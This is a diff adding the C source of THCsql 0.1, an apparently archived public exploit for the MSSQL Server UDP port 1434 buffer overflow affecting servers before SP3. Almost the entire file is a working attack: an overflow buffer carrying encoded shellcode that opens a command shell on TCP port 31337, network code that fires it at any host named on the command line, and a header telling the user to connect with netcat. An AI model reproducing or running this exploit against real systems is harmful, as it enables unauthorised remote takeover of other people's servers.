--- /dev/null
+/*****************************************************************************/\r
+/* THCsql 0.1 - MSSQL Server exploit for Server < SP3 */\r
+/* Exploit by: Johnny Cyberpunk (jcyberpunk@thehackerschoice.com) */\r
+/* THC PUBLIC SOURCE MATERIALS */\r
+/* */\r
+/* The exploit can be freely distributed ! */\r
+/* */\r
+/* This is just another exploit for the well known mssql server bug which */\r
+/* was found by David Litchfield last summer. Details in this advisory: */\r
+/* http://www.nextgenss.com/advisories/mssql-udp.txt */\r
+/* */\r
+/* This exploit was tested on an english Windows 2k Server SP2 and MSSQL */\r
+/* Server with SP0 and SP2 and has worked properly. The used shellcode is */\r
+/* completely offsetless, which makes this exploit quite stable */\r
+/* */\r
+/* After successful exploitation of this bug, a commandshell should spawn on */\r
+/* TCP port 31337 ! Use netcat to connect to this port ! */\r
+/* */\r
+/* If there's no connectable port 31337, maybe it's blocked by a firewall ! */\r
+/* */\r
+/* compile with MS Visual C++ : cl THCsql.c /link ws2_32.lib */\r
+/* */\r
+/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */\r
+/* scut, stealth, zip, zilvio and the rest of the combo ...... */\r
+/*****************************************************************************/\r
+\r
+#include <stdio.h>\r
+#include <stdlib.h>\r
+#include <string.h>\r
+#include <winsock2.h>\r
+\r
+char badbuffer[] =\r
+"\x04"\r
+"THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHC"\r
+"THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHC"\r
+"\xdc\xc9\xb0\x42"\r
+"\xeb\x0e"\r
+"JC"\r
+"THC!"\r
+"\x01\x70\xae\x42"\r
+"\x01\x70\xae\x42"\r
+"\x8b\xfc\x83\xc7\x2c\x66\x81\xec\x04\x02\x33\xc9\xb2\x35\x66"\r
+"\x81\xc1\x38\x01\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\xde\x16"\r
+"\x4f\x5c\x37\x30\x59\x6c\xcd\x28\xa9\xeb\xb9\xe4\x79\x45\xe1"\r
+"\x36\xc5\x12\x15\x15\x05\x3d\x62\x66\x07\x6a\x06\x07\x1b\x71"\r
+"\x79\x79\x34\xde\x30\xdd\xcc\xca\xca\xca\x68\xb6\xd8\x1f\x5f"\r
+"\x05\x6c\x51\xbe\x34\xbe\x75\x39\xbe\x45\x29\x98\xbe\x4d\x3d"\r
+"\xb8\x6a\x09\xbe\x2e\x34\xce\xbe\x6e\x4d\x34\xce\xbe\x7e\x29"\r
+"\x34\xcc\xbe\x66\x11\x34\xcf\x66\x64\x67\xbe\x6e\x15\x34\xce"\r
+"\x04\xfc\x74\x04\xf5\xac\xbe\x01\xbe\x34\xcb\x99\x04\xf7\xe4"\r
+"\xd7\xb1\xf5\x40\xc2\x3a\x83\x70\x30\xb8\x71\x70\x31\x53\x0c"\r
+"\x25\x40\xd4\x53\x04\x25\x6f\x6d\x6b\x63\x65\x67\x1e\x7b\x25"\r
+"\x74\x3a\x82\x39\x7f\xbe\x31\xbd\x34\xcd\x3a\x83\x78\x30\xbc"\r
+"\x71\xb8\xed\xcb\x78\x30\x40\x8b\xcb\x78\x31\x41\x14\xcb\x78"\r
+"\x17\xb8\x68\x2d\x66\xca\xe5\xbc\xf2\x5f\x31\x6d\xbd\x70\x30"\r
+"\xb5\x70\x42\x3f\xb8\x68\x41\xb5\x5e\x13\x21\xdc\x4d\xca\xca"\r
+"\xca\xbc\xfb\x04\xee\x66\x66\x66\x66\x63\x73\x63\xca\xe5\xa2"\r
+"\x60\x6d\x53\xbc\x05\x5f\x25\x60\x62\xca\x60\xe1\x7b\x63\x62"\r
+"\xca\x60\xf9\x66\x60\x62\xca\x60\xe5\xa2\xb8\x70\xbd\x65\xca"\r
+"\x60\xd1\x60\x60\xca\x60\xdd\xb8\x71\x30\x39\xa1\x66\x5d\x1b"\r
+"\x50\x4d\x50\x5d\x69\x56\x58\x51\xa1\x04\xe7\xb8\x70\xf9\xa1"\r
+"\x62\x62\x62\x66\x66\xcb\xf3\x34\xc7\x67\xa1\xb8\x70\x4d\x65"\r
+"\xb8\x70\xbd\x65\x84\x3d\x66\x66\x5f\x25\xcb\xfb\x67\x66\x66"\r
+"\x66\x60\xca\x60\xd9\x5f\xca\xca\x60\xd5";\r
+\r
+void usage();\r
+\r
+int main(int argc, char *argv[])\r
+{ \r
+ unsigned short sqlport=1434;\r
+ unsigned int sock,addr,rc;\r
+ struct sockaddr_in sqludp;\r
+ struct hostent * hp;\r
+ WSADATA wsaData;\r
+\r
+ printf("\nTHCsql v0.1 - Wind0wZ remote root sploit for MSSQL-Servers < SP3\n");\r
+ printf("by Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)\n");\r
+ printf("bug was found by David Litchfield\n");\r
+ \r
+ if(argc<2)\r
+ usage();\r
+ \r
+ if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)\r
+ {\r
+ printf("WSAStartup failed !\n");\r
+ exit(-1);\r
+ }\r
+ \r
+ hp = gethostbyname(argv[1]);\r
+\r
+ if (!hp){\r
+ addr = inet_addr(argv[1]);\r
+ }\r
+ if ((!hp) && (addr == INADDR_NONE) )\r
+ {\r
+ printf("Unable to resolve %s\n",argv[1]);\r
+ exit(-1);\r
+ }\r
+\r
+ sock=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);\r
+ if (!sock)\r
+ { \r
+ printf("socket() error...\n");\r
+ exit(-1);\r
+ }\r
+ \r
+ if (hp != NULL)\r
+ memcpy(&(sqludp.sin_addr),hp->h_addr,hp->h_length);\r
+ else\r
+ sqludp.sin_addr.s_addr = addr;\r
+\r
+ if (hp)\r
+ sqludp.sin_family = hp->h_addrtype;\r
+ else\r
+ sqludp.sin_family = AF_INET;\r
+\r
+ sqludp.sin_port=htons(sqlport);\r
+ \r
+ rc=connect(sock, (struct sockaddr *) &sqludp, sizeof (struct sockaddr_in));\r
+ if(rc==0)\r
+ {\r
+ send(sock,badbuffer,sizeof(badbuffer)-1,0);\r
+ printf("\nexploit send .... sleeping a while ....\n");\r
+ Sleep(1000);\r
+ printf("\nok ... now try to connect to port 31337 via netcat !\n");\r
+ }\r
+ else\r
+ printf("can't connect to sql port udp 1434!\n");\r
+ \r
+ shutdown(sock,1);\r
+ closesocket(sock);\r
+ exit(0);\r
+}\r
+\r
+void usage()\r
+{\r
+ unsigned int a;\r
+ printf("\nUsage: <Host>\n");\r
+ exit(0);\r
+}\r
projects / oweals / thc-archive.git / blobdiff